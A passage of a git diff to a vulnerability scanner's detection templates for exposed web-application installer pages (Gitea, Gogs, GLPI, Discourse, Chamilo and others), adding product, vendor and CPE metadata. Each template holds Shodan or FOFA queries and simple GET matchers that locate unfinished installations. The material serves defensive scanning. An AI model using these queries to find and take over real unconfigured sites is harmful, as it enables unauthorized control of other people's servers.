4a0a0047304502210091ee1386f473f7e0a8e534f84272c12cc950892a3524ab4bd88ba7b1343109db02206aa8ba2c3174fb8688acb3860aa67aba0c259635e2e1725512694e96f6f2640a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091ee1386f473f7e0a8e534f84272c12cc950892a3524ab4bd88ba7b1343109db02206aa8ba2c3174fb8688acb3860aa67aba0c259635e2e1725512694e96f6f2640a:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index fa9061a8a2..d4b05ffc9e 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: body="Setup | Cal.com" + product: cal.com + vendor: cal tags: misconfig,install,exposure,cal + classification: + cpe: cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220279f9da2572a41913a0eb3bf60b546901afd18ad7278c3fa0d440bc58b60d39702200505b5407d2986b988c9a939e0294228166102d509b4fc3f60c287a81143c523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220279f9da2572a41913a0eb3bf60b546901afd18ad7278c3fa0d440bc58b60d39702200505b5407d2986b988c9a939e0294228166102d509b4fc3f60c287a81143c523:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/chamilo-installer.yaml b/http/misconfiguration/installer/chamilo-installer.yaml index 1dc8b4824e..8ba6f1d41a 100644 --- a/http/misconfiguration/installer/chamilo-installer.yaml +++ b/http/misconfiguration/installer/chamilo-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: title:"Chamilo has not been installed" + product: chamilo + vendor: chamilo tags: misconfig,chamilo,install,exposure + classification: + cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: part: body words: - 'Chamilo has not been installed' -# digest: 490a0046304402205b0756c019bb7b1abbd48a0dc259ed7353203f0f8b43c1ab9ea2c23e06c47cc4022076c08eb4ab70f68d187c606b7148288a27ee88f825dd94d9a6133bdca0eda950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b0756c019bb7b1abbd48a0dc259ed7353203f0f8b43c1ab9ea2c23e06c47cc4022076c08eb4ab70f68d187c606b7148288a27ee88f825dd94d9a6133bdca0eda950:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index 334360eed5..1079768993 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H cvss-score: 9.4 cwe-id: CWE-284 + cpe: cpe:2.3:h:circontrol:circarlife:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"- setup" html:"Modem setup" + product: circarlife + vendor: circontrol tags: scada,circontrol,circarlife,setup,exposure,panel,installer,misconfig http: diff --git a/http/misconfiguration/installer/clipbucket-installer.yaml b/http/misconfiguration/installer/clipbucket-installer.yaml index af7d768794..5b570d7d44 100644 --- a/http/misconfiguration/installer/clipbucket-installer.yaml +++ b/http/misconfiguration/installer/clipbucket-installer.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: http.favicon.hash:538583492 fofa-query: icon_hash="538583492" + product: clipbucket + vendor: clip-bucket tags: misconfig,clipbucket,install,exposure + classification: + cpe: cpe:2.3:a:clip-bucket:clipbucket:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b0232e0f9d6cc10a6b6b81af15074c2d3071badba75eb623cd7395ab80c7a0f9022011fb63fbd16492a3889ae16290c0d8af40631603dfecb07a53490e3283c38142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0232e0f9d6cc10a6b6b81af15074c2d3071badba75eb623cd7395ab80c7a0f9022011fb63fbd16492a3889ae16290c0d8af40631603dfecb07a53490e3283c38142:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/cloudcenter-Installer.yaml b/http/misconfiguration/installer/cloudcenter-Installer.yaml index a5ce3faf22..a9824dad6b 100644 --- a/http/misconfiguration/installer/cloudcenter-Installer.yaml +++ b/http/misconfiguration/installer/cloudcenter-Installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"CloudCenter Installer" + product: cloudcenter + vendor: cisco tags: misconfig,cisco,cloudcenter,install,exposure + classification: + cpe: cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031c0d953e9c0ac319d7fd76c22f1a1da2f4713e73faa5a0ab3e33a7b41a3dc66022100f7f1f7c008cd9010950a91333afd5f396f973825ae374a4322b2dcf7f52468c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031c0d953e9c0ac319d7fd76c22f1a1da2f4713e73faa5a0ab3e33a7b41a3dc66022100f7f1f7c008cd9010950a91333afd5f396f973825ae374a4322b2dcf7f52468c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/codeigniter-installer.yaml b/http/misconfiguration/installer/codeigniter-installer.yaml index 037ead8dc8..58f2b14282 100644 --- a/http/misconfiguration/installer/codeigniter-installer.yaml +++ b/http/misconfiguration/installer/codeigniter-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Codeigniter Application Installer" + product: codeigniter + vendor: codeigniter tags: misconfig,codeigniter,install,exposure + classification: + cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f5a7be95611a09d7ddfed23dd31623ab52be56be04a6dad23b28f5d4c1ae50f02204ecdc564640c43c3a3b70a31e63ce90ac35606079e31f5dd5c0c3ebb59fac106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205f5a7be95611a09d7ddfed23dd31623ab52be56be04a6dad23b28f5d4c1ae50f02204ecdc564640c43c3a3b70a31e63ce90ac35606079e31f5dd5c0c3ebb59fac106:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/combodo-itop-installer.yaml b/http/misconfiguration/installer/combodo-itop-installer.yaml index b0fab335b5..a1183f7db8 100644 --- a/http/misconfiguration/installer/combodo-itop-installer.yaml +++ b/http/misconfiguration/installer/combodo-itop-installer.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: html:"Installation" html:"itop" + product: itop + vendor: combodo tags: misconfig,itop,install,exposure + classification: + cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220471fdc699623440130dd74256b7869b21664828661f159a94535029f6c2c2e45022100da8b7c1e8bef0e17c904d5fa71cc374b4d1d05bcc995195d8f13adc7a1ace2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220471fdc699623440130dd74256b7869b21664828661f159a94535029f6c2c2e45022100da8b7c1e8bef0e17c904d5fa71cc374b4d1d05bcc995195d8f13adc7a1ace2a8:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/concrete-installer.yaml b/http/misconfiguration/installer/concrete-installer.yaml index 0d8a340a2e..312f64f518 100644 --- a/http/misconfiguration/installer/concrete-installer.yaml +++ b/http/misconfiguration/installer/concrete-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Install concrete" + product: concrete_cms + vendor: concretecms tags: misconfig,exposure,install,concrete + classification: + cpe: cpe:2.3:a:concretecms:concrete_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aee4c924c2e7aa89a7cf5c5e8a62ffa301ab5bf24ac02ebfe4a50c52fb5247fe022100fe66bcf33dc4c5b8a7b3ba0ac201fdf08641b402364e0b685115bd990834e9b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aee4c924c2e7aa89a7cf5c5e8a62ffa301ab5bf24ac02ebfe4a50c52fb5247fe022100fe66bcf33dc4c5b8a7b3ba0ac201fdf08641b402364e0b685115bd990834e9b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/connectwise-setup.yaml b/http/misconfiguration/installer/connectwise-setup.yaml index 129746b046..9b5d91fde1 100644 --- a/http/misconfiguration/installer/connectwise-setup.yaml +++ b/http/misconfiguration/installer/connectwise-setup.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"ContentPanel SetupWizard" + product: control + vendor: connectwise tags: misconfig,exposure,install,connectwise + classification: + cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f47dad19f8e02b2a0a8d30cfa4725100d87c0107b17e79cf622c0d626d5b4020220046f1b19eb9b4ff547894be2403d51c958c338c32a68cb56218b22edca0eea79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f47dad19f8e02b2a0a8d30cfa4725100d87c0107b17e79cf622c0d626d5b4020220046f1b19eb9b4ff547894be2403d51c958c338c32a68cb56218b22edca0eea79:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml index 6eaa0776c4..3c58d28f86 100644 --- a/http/misconfiguration/installer/custom-xoops-installer.yaml +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: title="XOOPS Custom Installation" + product: xoops + vendor: xoops tags: misconfig,xoops,installer + classification: + cpe: cpe:2.3:a:xoops:xoops:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/discourse-installer.yaml b/http/misconfiguration/installer/discourse-installer.yaml index ee9d57887d..5a083aa657 100644 --- a/http/misconfiguration/installer/discourse-installer.yaml +++ b/http/misconfiguration/installer/discourse-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Discourse Setup" + product: discourse + vendor: discourse tags: misconfig,discourse,install + classification: + cpe: cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201ea8e1354bc06bd0609e85d1ed297952d0b8077c52cd2862a976055978d7e411022062c47a84f1d694dcf4b5e8d53809ce41657e918297bd438924b175a1e83eb7d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ea8e1354bc06bd0609e85d1ed297952d0b8077c52cd2862a976055978d7e411022062c47a84f1d694dcf4b5e8d53809ce41657e918297bd438924b175a1e83eb7d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/dokuwiki-installer.yaml b/http/misconfiguration/installer/dokuwiki-installer.yaml index 6b23f01b69..63cc03ad1f 100644 --- a/http/misconfiguration/installer/dokuwiki-installer.yaml +++ b/http/misconfiguration/installer/dokuwiki-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"DokuWiki" + product: dokuwiki + vendor: dokuwiki tags: misconfig,dokuwiki,install,exposure + classification: + cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b4eae166b02d173f22d0da3b881033b343d9cd3bff6e4668fdcfef7eaf47283602203ed0a0ad8427cffaf50092e8dcd5474e1d2725a90a1487f84f40622a009f7e44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4eae166b02d173f22d0da3b881033b343d9cd3bff6e4668fdcfef7eaf47283602203ed0a0ad8427cffaf50092e8dcd5474e1d2725a90a1487f84f40622a009f7e44:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/dolibarr-installer.yaml b/http/misconfiguration/installer/dolibarr-installer.yaml index 1fdf668b88..fd3755f828 100644 --- a/http/misconfiguration/installer/dolibarr-installer.yaml +++ b/http/misconfiguration/installer/dolibarr-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Dolibarr install or upgrade" + product: dolibarr_erp\\/crm + vendor: dolibarr tags: misconfig,exposure,install + classification: + cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220634532cbd8d85911eb5be70b6c6ba95f4e883927aeefa918bb7c7f7eec6c70e402200490d5848a436de703b294c57a533b11b5ef3006488a289b72028e9842d55872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220634532cbd8d85911eb5be70b6c6ba95f4e883927aeefa918bb7c7f7eec6c70e402200490d5848a436de703b294c57a533b11b5ef3006488a289b72028e9842d55872:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/dolphin-installer.yaml b/http/misconfiguration/installer/dolphin-installer.yaml index cb8b23f40f..5ef1e11140 100644 --- a/http/misconfiguration/installer/dolphin-installer.yaml +++ b/http/misconfiguration/installer/dolphin-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 fofa-query: icon_hash="-945121295" + product: dolphin + vendor: boonex tags: misconfig,dolphin,install,exposure + classification: + cpe: cpe:2.3:a:boonex:dolphin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e6b2fd88a257051a5608fae50cd2753b42cbcd9ade619801f1dd865ffcd4524022100ba02eaf7a87dd285bcebb9db846e46e7302c328948a8cc7b01e839447d1be726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e6b2fd88a257051a5608fae50cd2753b42cbcd9ade619801f1dd865ffcd4524022100ba02eaf7a87dd285bcebb9db846e46e7302c328948a8cc7b01e839447d1be726:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml index e0d89207e3..872bdb18da 100644 --- a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml +++ b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"EJBCA Enterprise Cloud Configuration Wizard" + product: ejbca + vendor: primekey tags: misconfig,install,exposure,ejbca + classification: + cpe: cpe:2.3:a:primekey:ejbca:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a2e706b8c94579f157f9d6c9567084d9efca7244efa710bd8a17185c2b787fd1022100bee3f9d99ebd4795e3e2730e34f0d70ccac6eb051b20a36d894cd36e401f5b4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2e706b8c94579f157f9d6c9567084d9efca7244efa710bd8a17185c2b787fd1022100bee3f9d99ebd4795e3e2730e34f0d70ccac6eb051b20a36d894cd36e401f5b4b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/elgg-install.yaml b/http/misconfiguration/installer/elgg-install.yaml index 4b65645c92..20e2dce4e9 100644 --- a/http/misconfiguration/installer/elgg-install.yaml +++ b/http/misconfiguration/installer/elgg-install.yaml @@ -11,8 +11,12 @@ info: max-request: 1 verified: true fofa-query: title="Welcome to Elgg" + product: elgg + vendor: elgg tags: install,elgg,exposure,misconfig + classification: + cpe: cpe:2.3:a:elgg:elgg:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,4 +28,4 @@ http: - 'contains_any(body,"Elgg Install : Welcome", "Installing Elgg", "Welcome to Elgg")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502205eea6dd5e913f95ea9c012b78d1994d5fde3c95ad10b6ec91755aa559a38120a02210095c06cb0e37c6846183ea56612ff208fae3e3dae2526158ecb37c11058a3b0bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205eea6dd5e913f95ea9c012b78d1994d5fde3c95ad10b6ec91755aa559a38120a02210095c06cb0e37c6846183ea56612ff208fae3e3dae2526158ecb37c11058a3b0bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/eshop-installer.yaml b/http/misconfiguration/installer/eshop-installer.yaml index d2cddbf5a1..519ed52a6e 100644 --- a/http/misconfiguration/installer/eshop-installer.yaml +++ b/http/misconfiguration/installer/eshop-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"eShop Installer" + product: eshop + vendor: oxid-esales tags: misconfig,eshop,install,exposure + classification: + cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b72e0d77fed8b47e8cdb9da1eda690fcb4d5e11b0b6614359d9560e7de36cd8402200347116bdd23cfac7ccc3e2b33f2ac6bbd0b9bb7bffa3e2f8c4dc5a8561931d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b72e0d77fed8b47e8cdb9da1eda690fcb4d5e11b0b6614359d9560e7de36cd8402200347116bdd23cfac7ccc3e2b33f2ac6bbd0b9bb7bffa3e2f8c4dc5a8561931d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/espocrm-installer.yaml b/http/misconfiguration/installer/espocrm-installer.yaml index 520106d974..90ef50240b 100644 --- a/http/misconfiguration/installer/espocrm-installer.yaml +++ b/http/misconfiguration/installer/espocrm-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Welcome to Espocrm" + product: espocrm + vendor: espocrm tags: misconfig,espocrm,install,exposure + classification: + cpe: cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6cf7cdc4e68510f8c1a4808b7e9ec263a30317d83437a3a888ca011977d2880022100801f7ad77b0ef1835e6329d6f4db0c8e5912c4fce349a5c142feb2cb7584e8b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6cf7cdc4e68510f8c1a4808b7e9ec263a30317d83437a3a888ca011977d2880022100801f7ad77b0ef1835e6329d6f4db0c8e5912c4fce349a5c142feb2cb7584e8b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/facturascripts-installer.yaml b/http/misconfiguration/installer/facturascripts-installer.yaml index 5e8e3fc8d5..f68a3bceee 100644 --- a/http/misconfiguration/installer/facturascripts-installer.yaml +++ b/http/misconfiguration/installer/facturascripts-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"FacturaScripts installer" + product: facturascripts + vendor: facturascripts tags: misconfig,facturascripts,install,exposure + classification: + cpe: cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022020a08dcfce34df1143ae7a6029f76d9ed4bfacb7ccd2b01245cd8d743ea3d5eb02203a4aafed8bb6675ad3e181378c7c97bd17bd89e04b723442658dd6d346e5ebbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020a08dcfce34df1143ae7a6029f76d9ed4bfacb7ccd2b01245cd8d743ea3d5eb02203a4aafed8bb6675ad3e181378c7c97bd17bd89e04b723442658dd6d346e5ebbf:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/flarum-installer.yaml b/http/misconfiguration/installer/flarum-installer.yaml index 1e193e60ca..d060142e5c 100644 --- a/http/misconfiguration/installer/flarum-installer.yaml +++ b/http/misconfiguration/installer/flarum-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"Install Flarum" + product: flarum + vendor: flarum tags: misconfig,install,exposure,flarum + classification: + cpe: cpe:2.3:a:flarum:flarum:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a3a5d3a8238918dd30f56b955dac4e3894fc39f4b12f41cc159e85a4e1567cbc0221009d6fe3368105a04c4f4701624cf092058c33431daa499dec912343e00a2744b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a3a5d3a8238918dd30f56b955dac4e3894fc39f4b12f41cc159e85a4e1567cbc0221009d6fe3368105a04c4f4701624cf092058c33431daa499dec912343e00a2744b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/fossbilling-installer.yaml b/http/misconfiguration/installer/fossbilling-installer.yaml index 86aa41c98f..aaf0032044 100644 --- a/http/misconfiguration/installer/fossbilling-installer.yaml +++ b/http/misconfiguration/installer/fossbilling-installer.yaml @@ -5,13 +5,17 @@ info: author: ritikchaddha severity: high description: | - FOSSBilling installation dashboard has been detected. + FOSSBilling installation dashboard has been detected. metadata: verified: true max-request: 1 shodan-query: title:"FOSSBilling" + product: fossbilling + vendor: fossbilling tags: fossbilling,install,misconfig + classification: + cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b7b0f6543091bf4d2e67ee2802feb0a57241e524da29c7f944e2ced8ec8e393c022061aea2773aebd96772ca54801007608b062c90bcf5d646e8ce1f4bc66dc017b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b7b0f6543091bf4d2e67ee2802feb0a57241e524da29c7f944e2ced8ec8e393c022061aea2773aebd96772ca54801007608b062c90bcf5d646e8ce1f4bc66dc017b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/freshrss-installer.yaml b/http/misconfiguration/installer/freshrss-installer.yaml index 18d0a8cb78..7c2bd18b07 100644 --- a/http/misconfiguration/installer/freshrss-installer.yaml +++ b/http/misconfiguration/installer/freshrss-installer.yaml @@ -10,8 +10,12 @@ info: max-request: 1 verified: true fofa-query: title="Installation · FreshRSS" + product: freshrss + vendor: freshrss tags: freshrss,misconfig,install + classification: + cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201be450e605b599c6d36b357788f621d3a83eab8869cb89db0ff2fbee40144bc3022100ddee3a990f7e99e484aab70b043588bef73456fad195f25223e240fb32da0499:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201be450e605b599c6d36b357788f621d3a83eab8869cb89db0ff2fbee40144bc3022100ddee3a990f7e99e484aab70b043588bef73456fad195f25223e240fb32da0499:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml index 1c93802949..839e2cc0c8 100644 --- a/http/misconfiguration/installer/froxlor-installer.yaml +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: title="Froxlor Server Management Panel - Installation" + product: froxlor + vendor: froxlor tags: misconfig,froxlor,installer + classification: + cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/gitea-installer.yaml b/http/misconfiguration/installer/gitea-installer.yaml index d824d04e10..b8c26bca90 100644 --- a/http/misconfiguration/installer/gitea-installer.yaml +++ b/http/misconfiguration/installer/gitea-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' + product: gitea + vendor: gitea tags: misconfig,gitea,install + classification: + cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066f56b7a2930ae1593161115abd054f1cde3376fff7c907e4d98fda3fe72d90b02210091ea2d42390407b9c1751b0d9f8570ac5d7c9b510f6ca102fddee07b16022220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066f56b7a2930ae1593161115abd054f1cde3376fff7c907e4d98fda3fe72d90b02210091ea2d42390407b9c1751b0d9f8570ac5d7c9b510f6ca102fddee07b16022220:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/glpi-installer.yaml b/http/misconfiguration/installer/glpi-installer.yaml index e65f9aaa2e..78f6833c41 100644 --- a/http/misconfiguration/installer/glpi-installer.yaml +++ b/http/misconfiguration/installer/glpi-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"Setup GLPI" + product: glpi + vendor: glpi-project tags: misconfig,install,exposure,glpi + classification: + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fab1664db0007ba958243c418dd797ae303186f6f4aef52864c05be2af3488b5022100eae3c16b34681d89735d78279ed5965fc9993f5e901ffcf0e8b06a2ce408dd88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fab1664db0007ba958243c418dd797ae303186f6f4aef52864c05be2af3488b5022100eae3c16b34681d89735d78279ed5965fc9993f5e901ffcf0e8b06a2ce408dd88:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/gogs-installer.yaml b/http/misconfiguration/installer/gogs-installer.yaml index 1dc77cace1..a07ec92d06 100644 --- a/http/misconfiguration/installer/gogs-installer.yaml +++ b/http/misconfiguration/installer/gogs-installer.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H cvss-score: 9.4 cwe-id: CWE-284 + cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Installation - Gogs" + product: gogs + vendor: gogs tags: misconfig,exposure,gogs,install http: diff --git a/http/misconfiguration/installer/growi-installer.yaml b/http/misconfiguration/installer/growi-installer.yaml index 14ff7eaaf4..fd34a01b0f 100644 --- a/http/misconfiguration/installer/growi-installer.yaml +++ b/http/misconfiguration/installer/growi-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"Installer - GROWI" + product: growi + vendor: weseek tags: install,growi,exposure,misconfig + classification: + cpe: cpe:2.3:a:weseek:growi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f65be3a6050ddbda3b9523c2e10b58d2cf48ffbbd21f935a017e14dcc947acf9022100a34f8984e2df5cebba225562822b5b07470f28262216dfd247f81e9729e968a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f65be3a6050ddbda3b9523c2e10b58d2cf48ffbbd21f935a017e14dcc947acf9022100a34f8984e2df5cebba225562822b5b07470f28262216dfd247f81e9729e968a3:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/impresspages-installer.yaml b/http/misconfiguration/installer/impresspages-installer.yaml index 1822a8e871..b7bb83dd99 100644 --- a/http/misconfiguration/installer/impresspages-installer.yaml +++ b/http/misconfiguration/installer/impresspages-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"ImpressPages installation wizard" + product: impresspages_cms + vendor: impresspages tags: misconfig,exposure,install,impresspages + classification: + cpe: cpe:2.3:a:impresspages:impresspages_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 